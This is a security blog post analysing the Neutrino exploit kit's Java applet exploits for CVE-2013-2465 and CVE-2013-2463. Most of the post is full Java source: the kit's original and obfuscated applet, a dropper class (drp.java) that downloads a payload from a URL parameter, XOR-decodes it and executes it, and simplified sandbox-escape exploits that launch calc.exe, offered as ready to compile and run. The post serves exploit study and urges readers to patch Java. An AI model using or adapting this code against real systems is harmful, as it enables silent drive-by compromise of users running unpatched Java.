A Java 6 killer – CVE-2013-2465 (update, now with CVE-2013-2463)

Now after my 30 day lab time at OffSec’s CTP course is up (awesome, more on that later), onto CVE-2013-2465, which can exploit all of Java 6, including the latest (6u45), as well as Java 7u21 and below and Java 5u45 and below. As noted elsewhere, this exploit, among many others, is significant as Java6u45 will not be patched by Oracle, so anyone not upgrading to Java 7 (ie the latest out there) will be easily exploited… not that Java 7 is much better, but at least it’s being patched… on occasion…

A nice source to take a look at these exploits can be found here (and great blog overall): http://malware.dontneedcoffee.com/2013/08/cve-2013-2465-integrating-exploit-kits.html. They also seem to have CVE-2013-2463, which there seems to be a buzz about, so will probably take a look at that later:

 

UPDATE: I decided I didn’t need sleep, took a look at the Neutrino CVE-2013-2463 acquired from dontneedcoffee.com as well as CVE-2013-2465. They are nearly the same, so figured might as well include both here 🙂

Anyway, I wanted to see how this exploit worked and put together some working code, so I downloaded Neutrino’s take on the exploit, and analyzed it (‘deobfuscating’ manually of course… I use that term loosely this time).

Starting with CVE-2013-2465:

alt(simplified)alt(original)drpijkikjjikjkikji
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Alt extends Applet
{
  private static final String space = "[0-9]";
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      if (ism())
        System.exit(0);
      String str = getParameter("exec");
      byte[] arrayOfByte = getParameter("xkey").getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean ism()
  {
    return jki.gg() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = ijk.scs();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), 
            localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(
            new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && 
            (arrayOfInt[(n + 1)] == 0) && 
            (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && 
            (arrayOfInt[(n + 4)] != 0) && 
            (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Alt extends Applet
{
  private static final String space = "[0-9]";
  private boolean _is64 = System.getProperty("os.arch", "").contains("23658960895608958238905234850894369806320987698476264".substring(51));

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      if (ism())
        System.exit(0);
      String str = getParameter("7383568568e464564568465656x568458456845684568e6546845685684568c45845684878467864757584".replaceAll("[0-9]", ""));
      byte[] arrayOfByte = getParameter("357868538x456845685368363865754767638967895738565437568568k65835683568335683456836e5658356856865856356y65548548685454".replaceAll("[0-9]", "")).getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean ism()
  {
    return jki.gg() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = ijk.scs();
      String str = "5787296778996057409608997181782001s38e45005225928t79487S9124417301e27388412740c6808u26779r304867i957349t193364y67997M1510a86087n53122a574023961g057026331060e06143687r9043645745487".replaceAll("[0-9]", "");
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { new ProtectionDomain(new CodeSource(null, new Certificate[0]), localPermissions) });
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = Raster.createWritableRaster(localMultiPixelPackedSampleModel, localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && (arrayOfInt[(n + 1)] == 0) && (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && (arrayOfInt[(n + 4)] != 0) && (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
drp.java

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.Channels;
import java.nio.channels.ReadableByteChannel;
import javax.xml.bind.DatatypeConverter;

class drp
{
  private static String db64(String paramString)
    throws UnsupportedEncodingException
  {
    byte[] arrayOfByte = DatatypeConverter.parseBase64Binary(paramString);
    return new String(arrayOfByte, "UTF-8");
  }

  public static void dx(String paramString, byte[] paramArrayOfByte)
    throws IOException
  {
    if (paramString.isEmpty())
      System.exit(0);
    if (!paramString.startsWith("http"))
      paramString = db64(paramString);
    if (!paramString.startsWith("http"))
      System.exit(0);
    ReadableByteChannel localReadableByteChannel = null;
    try
    {
      localReadableByteChannel = 
        Channels.newChannel(new URL(paramString).openStream());
    }
    catch (IOException localIOException)
    {
      System.exit(0);
    }
    for (ByteBuffer localByteBuffer = ByteBuffer.allocate(4096); 
        localReadableByteChannel.read(localByteBuffer) != -1; 
        localByteBuffer = rsb(localByteBuffer));
    byte[] arrayOfByte = new byte[localByteBuffer.position()];
    localByteBuffer.position(0);
    localByteBuffer.get(arrayOfByte);
    File localFile = File.createTempFile("~tmf", null);
    FileOutputStream localFileOutputStream = new FileOutputStream(localFile);
    int i = paramArrayOfByte.length;
    for (int j = 0; j < arrayOfByte.length; j++)
      arrayOfByte[j] = ((byte)(arrayOfByte[j] ^ paramArrayOfByte[(j % i)]));
    localFileOutputStream.write(arrayOfByte);
    localFileOutputStream.flush();
    localFileOutputStream.close();
    Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() });
    System.exit(0);
  }

  private static ByteBuffer rsb(ByteBuffer paramByteBuffer)
  {
    ByteBuffer localByteBuffer = paramByteBuffer;
    if (paramByteBuffer.remaining() < 4096)
    {
      localByteBuffer = ByteBuffer.allocate(paramByteBuffer.capacity() * 2);
      paramByteBuffer.flip();
      localByteBuffer.put(paramByteBuffer);
    }
    return localByteBuffer;
  }
}
ijk.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

public class ijk extends ICC_ColorSpace
{
  public ijk()
  {
    super(ICC_Profile.getInstance(1000));
  }

  public int getNumComponents()
  {
    int i = 1;
    return i;
  }

  public static Class scs()
  {
    return System.class;
  }
}
ikj.java

import java.beans.Statement;

public class ikj
{
  public static Object stt(Object paramObject, String paramString, 
    Object[] paramArrayOfObject)
    throws Exception
  {
    return new Statement(paramObject, paramString, paramArrayOfObject);
  }
}
jik.java

import java.beans.Statement;

public class jik
{
  public static Object sgt(Object paramObject)
  {
    return ((Statement)paramObject).getTarget();
  }
}
jki.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

public class jki extends ComponentColorModel
{
  public jki()
  {
    super(new ijk(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }

  public static SecurityManager gg()
  {
    return System.getSecurityManager();
  }
}
kji.java

import java.beans.Statement;

public class kji
{
  public static void ste(Object paramObject)
  {
    try
    {
      ((Statement)paramObject).execute();
    }
    catch (Exception localException)
    {
    }
  }
}

After some review, honestly, the exploit has very little obfuscation. Really, Alt.java is the most notable file, as it contains the actual exploit (the “attempt” function). The only other two files that are necessary are ijk.java (it extends ICC_ColorSpace) and jki (extends ComponentColorModel).

This is the reduced files (which as always, will pop up calc.exe upon exploit).

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

appletMainmyColorModelmyColorSpace
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

public class Alt extends Applet
{
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(
            new myColorModel(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = 
            new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 
            0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) 
            && (arrayOfInt[n] == 0) 
            && (arrayOfInt[(n + 1)] == 0) 
            && (arrayOfInt[(n + 2)] != 0) 
            && (arrayOfInt[(n + 3)] != 0) 
            && (arrayOfInt[(n + 4)] != 0) 
            && (arrayOfInt[(n + 5)] == 0) 
            && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }

  public static Class getSystemClass()
  {
    return System.class;
  }
}
Alt.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

public class myColorModel extends ComponentColorModel
{
  public myColorModel()
  {
    super(new myColorSpace(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }
}
Alt.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

public class myColorSpace extends ICC_ColorSpace
{
  public myColorSpace()
  {
    super(ICC_Profile.getInstance(1000));
  }

  public int getNumComponents()
  {
    int i = 1;
    return i;
  }
}

And, the result against Java6u45 (no click to run apparently necessary):
cve-2013-2465-success

The CVE description says this is related to “Incorrect image channel verification”.

The key seems to be where the AccessControlContext class is essentially passed a Permissions object containing AllPermission(). From what I gather, AffineTransformOp has a call to a vulnerable storeImageArray() method, which seems to have something like a buffer overflow vulnerability, where once outside of that buffer, you are working outside of the sandbox (or something like that, Java isn’t my specialty). Then you use the AllPermissions Permission to work without a Security Manager.

Update:
Now, taking a look at CVE-2013-2463, the code is just about the same, it just exploits AlphaComposite.Src.createContext instead of AffineTransformOp. But the end code is very similar (the key different areas are bolded). Also, only a single class is used for this exploit.

appletMain
Alt.java

import java.applet.Applet;
import java.awt.AlphaComposite;
import java.awt.CompositeContext;
import java.awt.image.DataBufferByte;
import java.awt.image.IndexColorModel;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

public class Alt2 extends Applet
{

  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte1 = new DataBufferByte(9);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      int i = arrayOfInt.length;
      DataBufferByte localDataBufferByte2 = new DataBufferByte(8);
      for (int j = 0; j < 8; j++)
        localDataBufferByte2.setElem(j, -1);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel1 = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 0);
      WritableRaster localWritableRaster1 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel1, localDataBufferByte2, null);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel2 = 
            new MultiPixelPackedSampleModel(0, 4, 2, 1, 
            1073741789 - (this._is64 ? 16 : 0), 288 + (this._is64 ? 128 : 0));
      WritableRaster localWritableRaster2 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel2, localDataBufferByte1, null);
      byte[] arrayOfByte = { 0, -1 };
      IndexColorModel localIndexColorModel = new IndexColorModel(1, 2, 
            arrayOfByte, arrayOfByte, arrayOfByte);
      CompositeContext localCompositeContext = 
            AlphaComposite.Src.createContext(
            localIndexColorModel, localIndexColorModel, null);
      localCompositeContext.compose(localWritableRaster1, 
            localWritableRaster2, localWritableRaster2);
      int k = arrayOfInt.length;
      if (k == i)
        return 1;
      int m = 0;
      int n = arrayOfObject2.length;
      for (int i1 = i + 2; i1 < i + 32; i1++)
        if ((arrayOfInt[(i1 - 1)] == n) 
            && (arrayOfInt[i1] == 0) 
            && (arrayOfInt[(i1 + 1)] == 0) 
            && (arrayOfInt[(i1 + 2)] != 0) 
            && (arrayOfInt[(i1 + 3)] != 0) 
            && (arrayOfInt[(i1 + 4)] != 0) 
            && (arrayOfInt[(i1 + 5)] == 0) 
            && (arrayOfInt[(i1 + 6)] == 0))
        {
          int i2 = arrayOfInt[(i1 + 4)];
          for (int i3 = i1 + 7; i3 < i1 + 7 + 64; i3++)
            if (arrayOfInt[i3] == i2)
            {
              arrayOfInt[(i3 - 1)] = arrayOfInt[(i1 + 3)];
              m = 1;
              break;
            }
          if (m != 0)
            break;
        }
      if (m != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  public static Class getSystemClass()
  {
    return System.class;
  }
}

The behavior of CVE-2013-2463 appears to be the same as CVE-2013-2465. Neither trigger a click-to-run Java warning, they both just run, exploit, and pop up calc.exe with no problems.

In any case, some fairly simple source code for this exploits are above, and no special byte code alterations needed like last time, just compile and go.

As always, again:

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

And if you run Java… just uninstall or at least patch…

Leave a Comment


NOTE - You can use these HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>